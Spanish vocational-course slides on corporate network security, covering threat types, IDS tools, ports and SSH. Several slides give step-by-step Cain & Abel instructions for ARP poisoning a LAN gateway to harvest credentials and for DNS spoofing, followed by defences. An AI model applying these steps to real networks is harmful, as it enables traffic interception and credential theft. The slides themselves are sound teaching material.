Ciclo Formativo de Grado Superior de Administración de Sistemas Informáticos en Red

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Ciclo Formativo de Grado Superior de Administración de Sistemas Informáticos en Red"

Transcripción

1 Ciclo Formativo de Grado Superior de Administración de Sistemas Informáticos en Red Módulo Profesional: SAD U.T.7.- Seguridad en redes corporativas Departamento de Informática y Comunicación IES San Juan Bosco (Lorca-Murcia) Profesor: Juan Antonio López Quesada

2

3 Objetivos del Capítulo Amenazas y Ataques en una red Corporativa Sistemas de Detección de Intrusos (IDS) Riesgos Potenciales de los Servicios de Red Comunicaciones Seguras Sistemas de Seguridad en WLAN Referencias WEB Enlaces a Herramientas SW Prácticas/Actividades 3

4 Valorar los nuevos peligros derivados de la conexión a redes Adoptar medidas de seguridad en redes corporativas o privadas tanto cableadas como inalámbricas Analizar las principales vulnerabilidades de las redes inalámbricas Comprender la importancia de los puertos de comunicaciones y las amenazas existentes en protocolos poco seguros Conocer y emplear protocolos y aplicaciones seguras en comunicaciones 4

5 En la actualidad la seguridad de redes es parte esencial de las redes informáticas, la seguridad de redes esta compuesta por Protocolos, Tecnologías, Dispositivos, herramientas y técnicas que protegen los datos y disminuyan las amenazas. Desde los años 1960 empezaron a surgir soluciones tecnológicas para el campo de la seguridad de redes, pero se empezaron a generarse soluciones informáticas para seguridad en grandes escalas a partir del año El mayor interés en la seguridad de Redes informáticas se da por la necesidad de mantenerse un paso por delante de los Hackers con malas intensiones (Pronto hablaremos sobre los tipos de Hackers). De la misma forma como los Ingenieros tratan de prevenir perdidas, reducir costos y proponer soluciones optimizadas, los especialistas en el área de seguridad de redes informáticas deben tratar de prevenir ataques minimizando o eliminando los efectos de los ataques de forma continua y en tiempo real. Adicionalmente al interés por mantenerse por delante de las personas malintencionadas, también es un factor importante mantener la continuidad del negocio ya que mientras menor sea la disponibilidad del servicio mayores serán las perdidas de producción. 5

6 Se entiende por amenaza una condición del entorno del sistema de información (persona, máquina, suceso o idea) que, dada una oportunidad, podría dar lugar a que se produjese una violación de la seguridad (confidencialidad, integridad, disponibilidad o uso legítimo). La política de seguridad y el análisis de riesgos habrán identificado las amenazas que han de ser contrarrestadas, dependiendo del diseñador del sistema de seguridad especificar los servicios y mecanismos de seguridad necesarios. Las amenazas a la seguridad en una red pueden caracterizarse modelando el sistema como un flujo de información desde una fuente, como por ejemplo un fichero o una región de la memoria principal, a un destino, como por ejemplo otro fichero o un usuario. Un ataque no es más que la realización de una amenaza. 6

7 7

8 Interrupción: un recurso del sistema es destruido o se vuelve no disponible. Este es un ataque contra la disponibilidad. Ejemplos de este ataque son la destrucción de un elemento hardware, como un disco duro, cortar una línea de comunicación o deshabilitar el sistema de gestión de ficheros. Intercepción: una entidad no autorizada consigue acceso a un recurso. Este es un ataque contra la confidencialidad. La entidad no autorizada podría ser una persona, un programa o un ordenador. Ejemplos de este ataque son pinchar una línea para hacerse con datos que circulen por la red y la copia ilícita de ficheros o programas (intercepción de datos), o bien la lectura de las cabeceras de paquetes para desvelar la identidad de uno o más de los usuarios implicados en la comunicación observada ilegalmente (intercepción de identidad). Modificación: una entidad no autorizada no sólo consigue acceder a un recurso, sino que es capaz de manipularlo. Este es un ataque contra la integridad. Ejemplos de este ataque son el cambio de valores en un archivo de datos, alterar un programa para que funcione de forma diferente y modificar el contenido de mensajes que están siendo transferidos por la red. Fabricación: una entidad no autorizada inserta objetos falsificados en el sistema. Este es un ataque contra la autenticidad. Ejemplos de este ataque son la inserción de mensajes espurios en una red o añadir registros a un archivo. 8

9 Como ejemplos prácticos de dichas amenazas, encontramos diversas técnicas de ataques informáticos en redes. Algunos son: Ataque de denegación de servicio: también llamado ataque DoS (Deny of Service), es un caso específico de interrupción de servicio. Causa que un servicio o recurso sea inaccesible a los usuarios legítimos, normalmente provocando la perdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la victima. Mediante botnet o redes zombi se pueden llegar a controlar cientos o miles de máquinas para realizar ataques distribuidos de saturación de servidores oddos. 9

10 Sniffing, es una técnica de interceptación: consiste en rastrear monitorizando el tráfico de una red. Man in the middle: a veces abreviado MitM, es un caso específico de interceptación y modificación identidad. Un atacante supervisa una comunicación entre dos partes, falsificando las identidades de uno de los extremos, y por tanto recibiendo el tráfico en los dos sentidos. 10

11 Spoofing: es una técnica de fabricación o suplantando la identidad, por ejemplo encontramos falsificaciones de IP, MAC, web o mail. Pharming: es una técnica de modificación. Mediante la explotación de una vulnerabilidad en el software de los servidores DNS o en el de los equipos de los propios usuarios, permite modificar las tablas DNS redirigiendo un nombre de dominio (domain name) conocido, a otra máquina (IP) distinta, falsificada y probablemente fraudulenta. 11

12 A continuación veremos -una introducción muy somera- ejemplos/prácticas en las que se emplean dichas técnicas: Sniffing - MitM - ARP Spoofing - Pharming La monitorización del trafico de red es un aspecto fundamental para analizar que está sucediendo en la misma, y poder tomar precauciones y medidas de seguridad en la misma. Herramientas como Wireshark, NMAP, Cain & Abel o arpoison permiten realizar una monitorización de que equipos se encuentran conectados en una red y que puertos y aplicaciones utilizan. En nuestro caso podemos empezar realizando una serie de prácticas que permiten ver las vulnerabilidades de protocolos como ARP y DNS, y de este modo tomar ciertas precauciones. Utilizaríamos una herramienta para sistemas Windows denominada Cain & Abel, aunque para GNU/Linux podemos emplear Ettercap que posee similares prestaciones. En primer lugar seleccionaremos la pestana superior Sniffer y la inferior Hosts. Pulsaremos sobre el botón superior de sniffing, escaneará nuestra red local y nos dará información (IP y MAC) de qué equipos se encuentran en red con nuestro equipo. 12

13 ARP POISONING EL ARP Spoofing, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red Ethernet conmutada (basada en switch y no en hubs), que puede permitir al atacante monitorizar paquetes de datos en la LAN (red de área local), incluso modificar el tráfico. El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados, o spoofed) a los equipos de la LAN. Normalmente la finalidad es asociar la dirección MAC del atacante con la dirección IP de otro equipo, como por ejemplo la puerta de enlace predeterminada (gateway). De esta forma cualquier tráfico dirigido a la dirección IP de ese equipo suplantado (por ejemplo el gateway), será enviado al atacante, en lugar de a su destino real. El atacante, puede entonces elegir, entre reenviar el tráfico a el equipo real (ataque pasivo o escucha, empleado en MitM) o modificar los datos antes de reenviarlos (ataque activo). 13

14 14

15 Para realizar un ataque ARP Poisoning o de envenenamiento ARP, seleccionamos la pestaña inferior APR, pulsamos el botón superior +. Seleccionaremos de los equipos de nuestra LAN, por que equipo queremos hacernos pasar (columna izquierda) y en que equipos queremos infectar su tabla ARP (columna derecha) con un entrada de nuestra MAC asociada a la IP del equipo a suplantar. En este caso el equipo por el que nos haremos pasar será la puerta de enlace ( ), ya que la mayoría del tráfico irá dirigido a este equipo. Podemos ver el antes y después de dicho envenenamiento en uno de los equipos infectados: En primer lugar la MAC de la puerta de enlace o router era D , a continuación después de realizar el envenenamiento disponemos de 2 entradas con la misma MAC, del equipo que va a recibir todo el trafico que vaya dirigido a la puerta de enlace. Mediante esta técnica es posible monitorizar el trafico que va dirigido al router y rastrear protocolos no seguros como FTP, HTTP, POP, SMTP, Telnet o FTP, y de esta forma obtener credenciales. 15

16 PHARMING Es posible realizar una inserción en las tablas locales de nombres de dominio, posibilitando un redireccionamiento a una IP con una web falsa. Seleccionando la pestaña inferior APR, y la opción APR- DNS podemos crear entradas de nombres de dominio con IP falsas. Vemos como después de realizar DNS spoofing, en unos de los equipos afectados, al hacer ping a google nos envía a una dirección IP falsa. Las falsificaciones de sitios web donde se hacen uso de credenciales mediante formularios, ponen en peligro nuestras contraseñas y por tanto la privacidad e integridad de nuestros datos. 16

17 Recomendaciones Para evitar este tipo de ataques se recomienda entre otras acciones, el uso de tablas ARP estáticas, o al menos, entradas estáticas como la que da acceso a la puerta de enlace, ya que la mayoría del tráfico pasa a través de esta IP. Se puede realizar mediante el comando: arp -s IP MAC. En redes grandes con gran cantidad de administración no es una buena solución, realizar esta configuración a mano. Para esos casos lo mejor es monitorizar los intentos de modificación de tablas ARP, por ejemplo mediante software especifico de detección de intrusos (IDS) como SNORT, o específicos de intentos de duplicados ARP: bajo GNU/Linux Arpwatch o en Windows DecaffeinatlD o realizar una monitorización especifica mediante Wireshark que es capaz de detectar intentos de duplicados ARP. En el caso de DNS spoofing, debemos tener especial precaución con las falsificaciones de sitios web, comprobando en los sitios web que enviamos credenciales (mail, redes sociales, banca, comercio online, etc.) que emplean protocolos seguros, como HTTPS, certificado digital que permita ver su autenticidad, y otros aspectos como la veracidad de su URL, o que nunca nos pedirán por otras vías de comunicación (teléfono o mail) el envío de dichas credenciales. 17

18 Detectar sniffers en una red Por lo general, la detección de sniffers en una red es una tarea complicada, sin embargo, en algunos casos se pueden usar una serie de técnicas que permiten descubrir si un ordenador tiene instalado un sniffer. Si desea comprobar si hay algún sniffer funcionando en la red puede utilizar herramientas como Antisniff, Sentinel o Promiscan. Antisniff ( Es una de las mejores herramientas de detección de sniffer de forma remota, aunque quizás este un poquitín obsoleta, sobre todo porque no contempla la nueva generación de sniffers. Sentinel ( Permite detectar sniffer dentro de una red LAN. Promiscan ( Permite detectar si en una red hay un equipo con un adaptador de red en modo promiscuo (sniffer). La utilización de promiscan es muy sencilla ya que tan sólo hay que instalarlo y él automáticamente escanea la red en busca de un equipo en modo promiscuo. Pero la mejor medida que podemos tomar es encriptar todas nuestras comunicaciones, así aunque las capturen no servirán para nada. 18

19 Las amenazas de seguridad causadas por intrusos en redes corporativas o privadas de una organización, pueden originarse tanto de forma interna como externa. Amenaza externa o de acceso remoto: los atacantes son externos a la red privada o interna de una organización, y logran introducirse desde redes públicas. Los objetivos de ataques son servidores y routers accesibles desde el exterior, y que sirven de pasarela de acceso a la redes corporativa. Amenaza interna o corporativa: los atacantes acceden sin autorización o pertenecen a la red privada de la organización. De esta forma pueden comprometer la seguridad y sobre todo la información y servicios de la organización. Con estos 2 frentes abiertos, veremos por un lado como defender la seguridad en la red corporativa de forma interna (UT7), y por otro como disponer de medidas de protección perimetral (UT8), en los equipos y servicios que estén expuestos a redes publicas 19

20 Para protegemos de las posibles amenazas internas algunas propuestas son: Realizar un buen diseña de direccionamiento, parcelación y servicios de subredes dentro de nuestra red corporativa. Para ello se emplean técnicas como, subnetting, redes locales virtuales o VLAN y creación de zonas desmilitarizadas o DMZ, aislando y evitando que los usuarios puedan acceder directamente en red local con los sistemas críticos. Políticas de administración de direccionamiento estático para servidores y routers. Monitorización del tráfico de red y de las asignaciones de direccionamiento dinámico y de sus tablas ARP. Modificación de configuraciones de seguridad y, en especial contraseñas por defecto de la administración de servicios. En redes inalámbricas emplear el máximo nivel de seguridad. 20

21 1. Introducción 2. Técnica de Detección de Intrusos 3. Tipos de IDS 4. Tabla de Herramientas de detección de Intrusos 5. HONEYPOT 6. SNORT 7. HIDS Linux md5sum tipwire Windows XINTEGRITY 21

22 Actualmente, la estrategia de control de intrusos más utilizada es la seguridad perimetral, basada en cortafuegos (unidad de trabajo 8.-). Los corta fuegos proporcionan una eficaz primera línea de defensa frente a amenazas externas. Una mala configuración de cortafuegos pueden volver completamente inútil la mejor política de seguridad. Por ello se vuelve necesaria la utilización de Sistemas de Detección de Intrusos (Intrusion Detection System, IDS) que vigila la red en busca de comportamientos sospechosos. Los sistema de detección de intrusos permiten detectar actividad inadecuada, incorrecta o anómala dentro de la red. Por lo tanto, en su sentido más amplio, un buen IDS será capaz de detectar las acciones de atacantes externos (intrusiones propiamente dichas), así como la actividad de los atacantes internos dentro de la red. Ahora bien, qué se entiende por actividad anómala? ó qué se considera como intrusión? Aunque la definición puede variar en función del IDS utilizado, en general se consideran intrusiones las siguientes actividades: 22

23 Reconocimiento. Los intrusos suelen explotar una red antes de intentar atacarla utilizando técnicas como barridos de ping, explotación de puertos TCP y UDP, identificación del SO, intentos de inicio de sesión, etc. Mientras que un cortafuegos puede limitarse a bloquearse esos sondeo, el IDS hará saltar la alarma. Explotación. Una vez que en la fase de reconocimiento se ha identificado el objetivo a atacar, el intruso intentará utilizar agujeros del sistema (p.e. fallos en los servidores Web, en los navegadores de los usuarios, enmascaramiento de IP, desbordamiento de buffer, ataques DNS). Muchos de estos ataques pasarán completamente desapercibidos en el cortafuegos, mientras que un buen IDS alertará de ellos. Denegación de servicio. Se trata de un ataque capaz de dejar sin servicio una determinada máquina. Normalmente, se utilizan técnicas como el ping de la muerte, inundación SYN, Land, WinNuke, smurtf, ataques distribuidos, etc. Algunos IDS podrán detectarlos antes de que los servidores bajo ataque dejen de funcionar. 23

24 Uno podría preguntarse para que necesitamos un IDS si ya tengo un cortafuegos? No bloquea este todos los ataques? En realidad, los cortafuegos están más orientados a proteger una red de ataques externos que de ataques procedentes de la propia red. Un cortafuegos bien configurado bloquea el acceso por puertos y protocolos excepto a unos cuantos especificados por el administrador, en los cuales se desea ofrecer ciertos servicios, como por ejemplo el servicio Web en el puerto TCP 80. Esto significa que se permitirá la entrada de tráfico dirigido a esos puertos, dándolo por bueno. El primer problema reside en la capacidad de atacar un servidor a través de puertos permitidos. Por ejemplo, el gusano Nimda se propagó por un agujero de IIS en servidores Windows 2000, enviando comandos para su ejecución en el servidor a través del puerto 80. Por tanto, estaba permitido su paso a través del cortafuegos. Un IDS se habría dado cuenta de que algo estaba ocurriendo. El segundo problema radica en que, normalmente, las reglas del cortafuegos bloquean el trafico de entrada, pero no el de salida. Precisamente, Nimda establece sesiones de TFTP desde dentro de la red protegida por el cortafuegos hacia fuera, burlando la protección de este. Un buen IDS responde eficientemente ante ataques internos y ataques externos a través de las rutas legítimas que explotan reglas permitidos por el cortafuegos 24

25 Existen dos tipo de técnicas para la detección de intrusos: a través de la detección de patrones anómalos o de firmas. Detección de patrones anómalos El IDS toma como referencia una idea estereotipada de lo que es el comportamiento normal del sistema y examina continuamente la actividad que está teniendo lugar, de manera que cualquier desviación de la norma se considera como sospechosa, en aplicaciones y programas y en el consumo de recursos. Por ejemplo, su un usuario normalmente inicia una sesión 2 veces al día, 30 inicios de sesión consecutivos pueden considerarse como sospechosos. Si un usuario nunca se conecta fuera del horario de trabajo, una conexión a las 4:00 de la mañana hará sospechar igualmente. Si un usuario nunca accede a la base da datos empresarial ni compila código fuente, puede resultar extraño que un día lo hago. Igualmente, existen aplicaciones del sistema independientes del usuario que poseen unos patrones de uso bien definidos, por lo que si se detectan cambios en ellos, pueden indicar la acción de un atacante. Por otro lado, si el IDS registra una sobrecarga inusual de recursos en la red, uso de disco, CPU, base de datos u otros recursos, podría indicar la realización de un ataque. El punto fuerte de la detección de anomalías estriba en la capacidad de detectar ataques nuevos totalmente desconocidos. Por desgracia, muchos patrones no defieren de los patrones de uso normal, por lo que pasarían desapercibidos. 25

26 Detección de firmas En este caso, el IDS posee unos patrones conocidos de uso incorrecto o no autorizado, también conocidos como firmas (signature), basadas en ataques o penetraciones pasadas. Todas las herramientas de hacking dejan una huella en el servidor, ya sea en el sistema de ficheros, en los registros de actividad o de otra forma, que suele ser característica de cada o de cada categoría de ataque. Por lo tanto, se trata de buscar la presencia de estas firmas en el tráfico de la red o en las peticiones enviadas a los hosts o en los registros. El mayor inconveniente de la detección de firmas es que no permite detectar ataques novedosos y, además, necesitan ser actualizados constantemente cada vez que se descubre un nuevo tipo de ataque. La detección de uso incorrecto suele implicarse por medio de sistemas expertos, razonamiento basado en modelos, análisis de transición de estados o redes neuronales. 26

27 Existen dos tipos de IDS: los IDS basados en Red NIDS y los IDS basados en Host HIDS Los sistemas de detección de intrusos basados en red (NIDS) son aplicaciones que, conectadas a la red a través de adaptadores en modo promiscuo, observan todo el tráfico de paquetes, detectando anomalías que puedan ser indicadoras de una intrusión. Funcionan de forma muy similar a como lo hacen los sniffers. Examinan cada paquete, comprobando su contenido con una plantilla o base de datos de firmas de ataques, con el fin de detectar si el paquete examinado se corresponde con algún tipo de ataque. Las ventajas de los NIDS son: Se instalan en segmentos de red, por lo que con un solo NIDS puede detectar ataques en todos los equipos conectados a dicho segmento, a diferencia de los HIDS, que exigen tener que instalar uno en cada equipo. Resultan independientes de la plataforma utilizada por los distintos equipos de la red. Al examinar de forma abstracta los paquetes de tráfico que circulan por la red, son capaces de detectar ataques basados en manipulación de cabeceras IP o ataques de denegación de servicio que serían capaces de bloquear un servidor. Resultan invisibles para los atacantes, a diferencia de los HIDS, que siempre dejan huella en el sistema en el que se ha instalado. 27

28 Sus desventajas son: Son ineficaces en sistemas con tráfico cifrado. Su funcionamiento se vuelve inviable en redes de alta velocidad impidiendo al NIDS analizar todos los paquetes a tiempo. Si se produce una congestión momentánea de la red, el NIDS podría empezar a perder paquetes. Debido a que operan en entonos heterogéneos (Windows, Linux, Sun, etc.) podrían no ser capaces de definir la relevancia de un ataque en cada plataforma. Los sistemas de detección de intrusos basados en host (HIDS) residen en el propio host que monitorizan, por lo que tienen acceso a información recolectada por las propias herramientas de auditoria del host (registros de actividad, accesos al sistema de ficheros, logs de registro, etc.). Incluyen plantillas configurables con los diferentes tipos de ataques predefinidos. 28

29 Las ventajas de los HIDS son: Detectan mejor los ataques desde dentro del equipo, ya que monitorizan inicios de sesión, cambios en ficheros, en el registro, etc. Son capaces de asociar usuarios y programas con sus efectos en el sistema. Los HIDS forman parte del propio blanco, por lo que pueden informar con gran precisión sobre el estado del blanco atacado. Sólo se preocupan de proteger el host en el que residen sin necesitar monitorizar todo el tráfico que circula por la red, por lo que no consumen tantos recursos como el NIDS ni afectan tanto al rendimiento del sistema. Las desventajas de los HIDS son: Su principal inconveniente es su lentitud de respuesta en comparación con los sistemas NIDS. Si se limitan a analizar los registros de actividad y cambios en el sistema de ficheros, descubren los ataques cuando ya han tenido lugar y puede ser demasiado tarde para actuar. Otro inconveniente es la dificultad de su implantación, ya que al estar instalados en varias máquinas diferentes será necesario el desarrollo en distintas plataformas. Como consecuencia, la mayoría de los fabricantes 29

30 ofrecen HIDS para una o dos plataformas (p.e. Solaris y Windows). No obstante, para paliar estos problemas muchos HIDS utilizan lenguajes multiplataforma como PERI, o Java, aunque aun así el tipo de ficheros y registros a monitorizar sigue dependiendo de la plataforma. Al residir en el host, desde el momento en el que este haya sido atacado con éxito, uno no puede confiar en sus informes, que podrían haber sido manipulados por un atacante excepcionalmente habilidoso. A diferencia de los NIDS, ante un ataque severo (p.e. denegación de servicio), si el host cae, el HIDS cae con él sin generar ninguna alerta. Ya que un HIDS sólo vigila el host en el que reside, para obtener una imagen global del estado del sistema se debe agregar y correlacionar la información de los distintos HIDS en uno o varios servidores centrales. Al ver las ventajas y desventajas de cada sistema de detección de intrusos, se ve claramente la necesidad de instalar ambos sistemas en una red, bien sea un mismo producto el que desempeñe ambas funciones. De esta forma, se obtienen las ventajas de cada uno de ellos, a la vez que se compensan sus debilidades. Como puede deducirse de las figuras de la siguiente diapositiva, la tendencia actual en los fabricantes apunta a la evolución hacia sistemas híbridos, que combinan lo mejor de ambos tipos. 30

31 31

32 32

33 33

34 Un honeypot (tarro de miel) permite simular uno o más sistemas fáciles de atacar con el fin de tentar a potenciales intrusos. El honeypot facialita ser invadido y entonces avisa de la intrusión al administrador del sistema. Gracias a esta estratagema, el honeypot permite proteger otras partes de la red al atraer sobre si mismo la atención de los atacantes, quienes se concentran en este blanco aparentemente fácil, pero que no contiene información valiosa ni puede ocasionar daños. Para que el engaño sea más completo, algunos honeypots simulan diferentes sistemas operativos, para observar a quien de ellos se dirige el atacante. Los honeypots suelen proporcionar evidencias forenses, ya que el atacante suele dejar en ellos las huellas necesarias que permitan rastrear sus pasos. Una de las herramientas que podemos utilizar se denomina honeyd ( Es un honeypot de bajo nivel de interactividad que permite simular múltiples sistemas operativos y aplicaciones. 34

35 Snort ( es un sistema de detección de intrusiones basado en red (NIDS). Implementa un motor de detección de ataques y barrido de puertos que permite registrar, alertar y responder ante cualquier anomalía previamente definida, como patrones que corresponden a ataques, barridos, intentos para aprovechar alguna vulnerabilidad, análisis de protocolos, etc. Snort está disponible bajo licencia GPL, es gratuito y funciona bajo plataformas Windows y GNUILinux. Es uno de los más usados y dispone de una gran cantidad de libros o patrones ya predefinidos, así como actualizaciones constantes ante casos de ataques, barridos o vulnerabilidades que vayan siendo detectadas a través de los distintos boletines de seguridad. Existen interfaces gráficas en Windows que facilitan la utilización de snort. Un ejemplo de ello se puede encontrar en idcenter ( tal y como puede 35

36 36

37 Los HIDS son sistemas de detección de intrusos basados en hosts que monitorizan el sistema en búsqueda de cualquier intento de intrusión. Uno de los elementos que monitorizan los HIDS es que no se produzca ninguna modificación en el sistema de ficheros. De esta forma, un HIDS puede monitorizar los archivos más importantes del sistema (p.e ficheros de configuración, datos de un portal) y, en el momento en que se produzca algún cambio, alertarnos del cambio y/o restaurarlo automáticamente. Así, si un intruso entra en nuestro sistema y altera algún fichero que se este monitorizando, el HIDS restaurará el fichero y nos avisará de la intrusión. Para monitorizar el sistema de ficheros, se calcula la firma digital de cada archivo o directorio. Para realizar la firma digital de un fichero, se utiliza su contenido, fecha de creación, nombre del fichero, propietario, permisos, etc. De esta forma, si se modifica cualquier dato del fichero, entonces cambia la firma digital y el sistema nos alerta de que el fichero ha cambiado. 37

38 El comando md5sum permite calcular la firma digital con el algoritmo md5. Para calcular la firma digital de un fichero, ejecute el comando md5sum nombre del fichero. 38

39 La herramienta tripwire ( es un comprobador de integridad para ficheros y directorios de sistemas Unix: compara un conjunto de estos objetos con la información sobre los mismos almacenada previamente en una base de datos, y alerta al administrador en caso de que algo haya cambiado. La idea es simple: se calcula la firma digital de cada fichero o directorio importante para nuestra seguridad nada más instalar el sistema, y esas firmas se almacenan en un medio seguro (un CD-ROM o un disco protegido contra escritura), de forma que si alguno de los ficheros es modificado, tripwire nos alertará la próxima vez que realicemos la comprobación. Para generar esos resúmenes, se utilizan funciones hash, de forma que es casi imposible que dos ficheros generen el mismo resumen; concretamente tripwire implementa MD2, MD4, MD5, Snefru, CRC-16 y CRC

40 Xintegrity ( es un HIDS que permite monitorizar el sistema de ficheros. Para ello, se pueden crear varias bases de datos de ficheros del sistema con programaciones diferentes. De esta forma, Xintegrity puede verificar de forma periódica el sistema de ficheros y, en caso de detectar un cambio en un fichero, notificarlo por y restaurar automáticamente el fichero. Una vez instalado Xintegrity, lo primero que debe hacer es configurar la cuenta de correo electrónico que quiere utilizar para recibir las notificaciones. Para ello, pulse en el menú Configuration, pulse en la pestañita e introduzca su cuenta de correo en la casilla Recipiente Address. A continuación, debe crear una base de datos que contenga los ficheros que desea monitorizar. Para ello, pulse en el menú DataBase y seleccione Create a database. Introduzca el nombre de la base de datos, su ubicación y el algoritmo de firma digital que desea utilizar (MD5 o SHA). Añadirá los ficheros que desea monitorizar teniendo cuidado de añadir el propio fichero ejecutable de Xintegrily para asegurarse de que el programa no es modificado. Para añadir los ficheros utilice, dentro del menú File, la opción Specific file y para añadir una carpeta, utilice la opción A cording to Location. 40

41 41

42 Una vez que ha añadido los ficheros en la base de datos, el siguiente paso que debe realizar es programar el análisis del sistema de ficheros. Para ello, seleccione la opción Checking scheudle que se encuentra dentro del menú Checking. Y finalmente, inicie la programación de tareas seleccionando la opción Start Scheudle Checking que se encuentra dentro del menú Checking. A partir de ahora, el sistema analizará de forma periódica el sistema de ficheros y, en caso de producirse un cambio en cualquier sistema, enviará un informe por . También puede analizar directamente el sistema de ficheros en busca de cualquier cambio. Al detectar cualquier cambio en el sistema de ficheros le solicitará el tipo de acción que desea realizar: ignorar el cambio, actualizar la base de datos o restaurar el fichero original. 42

43 TCP/IP es la arquitectura de protocolos que usan los ordenadores para comunicarse en Internet y, actualmente, casi en cualquier otra red. Emplean puertos de comunicaciones o numeración lógica que se asigna para identificar cada una de las conexiones de red, tanto en el origen como en el destino. No tiene ninguna significación física. Los servicios de red más habituales tienen asignados los denominados puertos bien conocidos, por ejemplo el 80 para HTTP o web, el 21 para transferencia de ficheros FTP, el 23 para TELNET, etc. Los puertos del 0 al 1023 son los "puertos conocidos" o reservados. En términos generales, están reservados para procesos del sistema (daemons) o programas ejecutados por usuarios privilegiados. Sin embargo, un administrador de red puede conectar servicios con puertos de su elección. Los puertos del 1024 al son los "puertos registrados". Los puertos del al son los "puertos dinámicos y/o privados". 43

44 Los distintos sistemas y sus aplicaciones de red, ofrecen y reciben servicios a través de dichos puertos de comunicaciones. Solo a través de un conocimiento y análisis exhaustivo de los puertos y las aplicaciones y equipos que los soportan podemos asegurar nuestras redes. El análisis y control de los puertos se pueden realizar desde distintos frentes: En una máquina local observando qué conexiones y puertos se encuentran abiertos y qué aplicaciones los controlan. El comando netstat permite ver el estado en tiempo real de nuestras conexiones. Los cortafuegos o firewall personales son una medida de protección frente a ataques externos. En la administración de red para ver qué puertos y en qué estado se encuentran los de un conjunto de equipos. La aplicación nmap permite un escaneo de puertos, aplicaciones y sistemas operativos, en un rango de direcciones. Los cortafuegos y proxys perimetrales ofrecen protección mediante un filtrado de puertos y conexiones hacia y desde el exterior de una red privada. Tras realizar un análisis exhaustivo a nivel de puertos, debemos proteger nuestras conexiones, haciéndolas seguras, por ejemplo cuando enviemos información confidencial. 44

45 1. Introducción 2. SSH 3. TLS/SSL 4. VPN 5. Vulnerabilidades en la Seguridad en Servidores WEB Introducción Búsqueda de vulnerabilidades XSS RFI y LFI Inyección SQL 45

46 La mayoría de las comunicaciones que empleamos en la red como HTTP, FTP o SMTP/POP, no emplean cifrado en las comunicaciones. Aunque existen protocolos que emplean comunicaciones cifradas SSH, soportando incluso el envío seguro de archivos mediante SFTP. Otras alternativas para establecer comunicaciones seguras entre 2 sistemas cifrando las comunicaciones a distintos niveles son: SSL y TLS: secure Sockets Layer Protocolo de Capa de Conexión Segura (SSL) y Transport Layer Security Seguridad de la Capa de Transporte -(TLS), su sucesor. Se ejecutan en una capa entre los protocolos de aplicación y sobre el protocolo de transporte TCP. Entre otros se emplea a través de puertos específicos con: HTTPS, FTPS, SMTP, POP3, etc IPSEC o Internet protocol security, es un conjunto de protocolos cuya función es asegurar las comunicaciones sobre el protocolo de internet (IP) autenticando y/o descifrando cada paquete IP en un flujo de datos. Actúan en la capa 3 lo que hace que se más flexible, ya que puede ser utilizado para proteger protocolos de la capa 4, incluyendo TCP y UDP. Una ventaja importante frente a otros métodos que operan en capas superiores, es que para que una aplicación pueda usar Ipsec no hay que hacer ningún cambio. 46

47 SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red. Permite manejar por completo la computadora mediante un intérprete de comandos, y también puede redirigir el tráfico de X para poder ejecutar programas gráficos si tenemos un Servidor X (en sistemas Unix y Windows) corriendo. Además de la conexión a otros dispositivos, SSH nos permite copiar datos de forma segura (tanto ficheros sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a los dispositivos y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante SSH. SSH trabaja de forma similar a como se hace con telnet. La diferencia principal es que SSH usa técnicas de cifrado que hacen que la información que viaja por el medio de comunicación vaya de manera no legible y ninguna tercera persona pueda descubrir el usuario y contraseña de la conexión ni lo que se escribe durante toda la sesión; aunque es posible atacar este tipo de sistemas por medio de ataques de REPLAY y manipular así la información entre destinos. 47

48 Al principio sólo existían los r-commands, que eran los basados en el programa rlogin, el cual funciona de una forma similar a telnet. La primera versión del protocolo y el programa eran libres y los creó un finlandés llamado Tatu Ylönen. En el año 1997 (dos años después de que se creara la primera versión) se propuso como borrador en la IETF. A principios de 1999 se empezó a escribir una versión que se convertiría en la implementación libre por excelencia, la de OpenBSD, llamada OpenSSH. Existen 2 versiones de SSH, la versión 1 de SSH hace uso de muchos algoritmos de encriptación patentados (sin embargo, algunas de estas patentes han expirado) y es vulnerable a un hueco de seguridad que potencialmente permite a un intruso insertar datos en la corriente de comunicación. La suite OpenSSH bajo Red Hat Enterprise Linux utiliza por defecto la versión 2 de SSH, la cual tiene un algoritmo de intercambio de llaves mejorado que no es vulnerable al hueco de seguridad en la versión 1. Sin embargo, la suite OpenSSH también soporta las conexiones de la versión 1. 48

49 Programas / Distribuciones SSH Tectia Servidor y cliente SSH comercial. Versiones para muchísimos sistemas operativos, tanto Windows como UNIX. OpenSSH Implementación SSH (servidor, cliente y utilidades) gratuita y para sistemas UNIX-like. Está desarrollado por OpenBSD. ossh - ftp://ftp.pdc.kth.se/pub/krypto/ossh/ - Implementación gratuita del protocolo SSH (servidor y cliente) para sistemas UNIX-like. Dispone de compresión de datos (incluye los datos de las X) y alta seguridad. Dropbear SSH Implementación del protocolo SSH (servidor y cliente) para sistemas UNIX-like. Hace hincapié en el consumo mínimo de recursos, para servidores limitados o con alta carga. MindTerm Cliente JAVA para SSH. Debido a estar hecho en java es altamente portable. PuTTY Cliente gráfico SSH, Telnet, rlogin... Muy popular debido a su simplicidad y que no necesita instalarse, es un único EXE. En la versión en desarrollo tiene soporte para terminales en el puerto série. Dispone de versión Windows y UNIX-like (requiere X). otras: Existen otras soluciones SSH, miles, y muchas mas si tenemos en cuenta la ingente cantidad de programas FTP que soportan SFTP. 49

50 Fuentes ftp://ftp.pdc.kth.se/pub/krypto/ossh/

51 51

